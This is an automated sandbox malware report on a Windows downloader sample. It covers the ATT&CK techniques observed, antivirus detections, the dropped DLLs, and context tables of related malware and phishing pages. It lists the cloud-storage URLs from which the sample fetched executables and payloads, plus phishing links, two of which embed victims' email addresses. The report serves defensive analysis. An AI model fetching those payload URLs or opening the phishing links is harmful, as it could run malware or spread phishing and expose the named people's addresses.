Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	41 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002B_246.exe	100%	Avira	TR/Dldr.Agent.ocdks
LisectAVT_2403002B_246.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Everything\app_core_legacy.dll	100%	Avira	TR/Redcap.jxchs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll	100%	Avira	TR/Redcap.jxchs
C:\Program Files (x86)\Everything\app_core_legacy.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllle	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe0	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllQ	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/s	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/p	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/g	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllj	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe	0%	Avira URL Cloud	safe
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/R	0%	Avira URL Cloud	safe
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin%6	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exeha	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlles	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllh	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/yh	0%	Avira URL Cloud	safe
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binloaderaHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1O	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll3	0%	Avira URL Cloud	safe
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/4	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllls	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/L	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.aF	0%	Avira URL Cloud	safe
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.a	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/y	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dll	0%	Avira URL Cloud	safe
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/A	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/z	0%	Avira URL Cloud	safe
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/g	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sgp.file.myqcloud.com	43.153.232.151	true	false	unknown
gz.file.myqcloud.com	159.75.57.36	true	false	unknown
www80-1323570959.cos.ap-singapore.myqcloud.com	unknown	unknown	false	unknown
wwwdll-1323570959.cos.ap-singapore.myqcloud.com	unknown	unknown	false	unknown
wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllle	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllQ	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/s	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe0	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllll	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/p	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exeha	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllj	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin%6	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlles	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.7.dr	false	URL Reputation: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/g	LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/R	LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllh	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/	LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/yh	LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.aF	LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll3	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binloaderaHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1O	LisectAVT_2403002B_246.exe	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/L	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllls	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/4	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllH	LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://wwwdll-1323570959.cos.a	LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/y	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/	LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/z	LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/g	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/A	LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
159.75.57.36	gz.file.myqcloud.com	China	1257	TELE2EU	false
43.153.232.151	sgp.file.myqcloud.com	Japan	4249	LILLY-ASUS	false
43.152.64.207	unknown	Japan	4249	LILLY-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481908
Start date and time:	2024-07-25 16:03:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002B_246.exe
Detection:	MAL
Classification:	mal68.winEXE@3/18@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 22 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: LisectAVT_2403002B_246.exe

Simulations

Behavior and APIs

Time	Type	Description
10:04:23	API Interceptor	1x Sleep call for process: LisectAVT_2403002B_246.exe modified
10:05:02	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
159.75.57.36	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse
	#U8d85#U7ea7#U6587#U672cTXT.exe	Get hash	malicious	AsyncRAT, DcRat, VenomRAT	Browse
	https://fxx922022webapps930-1312962597.cos.ap-guangzhou.myqcloud.com/fx.htm#junruh@greendotcorp.com	Get hash	malicious	Unknown	Browse
	1a#U77e5.exe	Get hash	malicious	Unknown	Browse
43.153.232.151	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	https://docs.google.com/forms/d/e/1FAIpQLSd_bMMDEWSSp-iRMafeGAWTfMTpG6IiqHpDoivX_zCH9lj_Zw/viewform	Get hash	malicious	HTMLPhisher	Browse
	https://vtcorporatelawyer-1321712386.cos.ap-singapore.myqcloud.com/vtcorporatelawyer.html	Get hash	malicious	HTMLPhisher	Browse
	https://kj8vfy3vivc1fhu-1320008508.cos.ap-singapore.myqcloud.com/kj8vfy3vivc1fhu.html	Get hash	malicious	HTMLPhisher	Browse
43.152.64.207	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_321.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	Complete Doc_ Notifier - ID #2378936496.eml	Get hash	malicious	HTMLPhisher	Browse
	https://www.canva.com/design/DAF8OGGfhO8/R6YCNNVrsg2_7X2EE7u58g/view?utm_c_ontent_=DAF8OGGfhO8&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse
	https://raleighhzonvetonlmcco.atlassian.net/wiki/external/MWQwOGRkM2JjODZiNDNiYWE1ZTk0NWU4NzU4ZTcyOGE	Get hash	malicious	Unknown	Browse
	https://wrightbeveragedistributing.sharefile.com/public/share/web-01fe49682dde4af5	Get hash	malicious	HTMLPhisher	Browse
	https://airtable.com/appaZCPEWVRuogU6k/shryk2nj8F4m42HYK	Get hash	malicious	HTMLPhisher	Browse
	Gadellnet-Thursday December 2023.html	Get hash	malicious	HTMLPhisher	Browse
	https://2idqb1wpk99m-1322892769.cos.ap-singapore.myqcloud.com/2idqb1wpk99m.html?e=bcooper@locktonaffinity.com'	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sgp.file.myqcloud.com	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002B_321.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_321.exe	Get hash	malicious	Unknown	Browse	43.153.232.152
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.153.232.152
	https://docs.google.com/presentation/d/e/2PACX-1vRohTcL0scSvPTUjrKWcVmyILi9jTVB0uhYEMgOqhUUgmUBldmrlihahC-89vk0R9QgPxfjip6DFmJL/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	43.152.64.193
	https://v02i29jwyl-1324277188.cos.ap-singapore.myqcloud.com/v02i29jwyl.html	Get hash	malicious	HTMLPhisher	Browse	43.153.232.152
gz.file.myqcloud.com	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	2IVWAPeiZm.exe	Get hash	malicious	GhostRat	Browse	159.75.57.35
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	159.75.57.69
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	159.75.57.69
	buding.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	Q6UkPxz1Bk.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	Q6UkPxz1Bk.exe	Get hash	malicious	Unknown	Browse	159.75.57.69

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELE2EU	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	Rx1EfzuTh3.elf	Get hash	malicious	Unknown	Browse	5.241.71.249
	3B4ehVz4C4.elf	Get hash	malicious	Mirai	Browse	83.185.2.111
	0SpHek7Jd8.elf	Get hash	malicious	Unknown	Browse	130.244.180.166
	Ym4vc47pgk.elf	Get hash	malicious	Unknown	Browse	90.131.48.45
	cJTpn6cF6x.elf	Get hash	malicious	Unknown	Browse	83.183.143.157
	4qOdQ3lrYx.elf	Get hash	malicious	Mirai	Browse	212.152.10.126
	ZPPEqPIBy7.elf	Get hash	malicious	Unknown	Browse	83.183.231.134
	92.249.48.47-skid.ppc-2024-07-20T09_04_20.elf	Get hash	malicious	Mirai, Moobot	Browse	193.216.244.26
LILLY-ASUS	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002B_321.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_321.exe	Get hash	malicious	Unknown	Browse	43.153.232.152
	LisectAVT_2403002B_429.exe	Get hash	malicious	Bdaejec	Browse	43.152.29.63
	LisectAVT_2403002B_463.exe	Get hash	malicious	Bdaejec	Browse	43.152.29.72
	LisectAVT_2403002B_447.exe	Get hash	malicious	Unknown	Browse	43.152.28.43
	LisectAVT_2403002B_463.exe	Get hash	malicious	Bdaejec	Browse	43.152.26.154
	arm7.elf	Get hash	malicious	Mirai	Browse	40.26.180.140
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
LILLY-ASUS	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002B_321.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_321.exe	Get hash	malicious	Unknown	Browse	43.153.232.152
	LisectAVT_2403002B_429.exe	Get hash	malicious	Bdaejec	Browse	43.152.29.63
	LisectAVT_2403002B_463.exe	Get hash	malicious	Bdaejec	Browse	43.152.29.72
	LisectAVT_2403002B_447.exe	Get hash	malicious	Unknown	Browse	43.152.28.43
	LisectAVT_2403002B_463.exe	Get hash	malicious	Bdaejec	Browse	43.152.26.154
	arm7.elf	Get hash	malicious	Mirai	Browse	40.26.180.140
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	43.152.64.193

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	IMG88957937579577593957937593756295Jimpy.exe	Get hash	malicious	GuLoader	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_286.exe	Get hash	malicious	Unknown	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_286.exe	Get hash	malicious	Unknown	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_272.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.153.232.151 43.152.64.207 159.75.57.36
	LisectAVT_2403002B_311.exe	Get hash	malicious	XRed	Browse	43.153.232.151 43.152.64.207 159.75.57.36
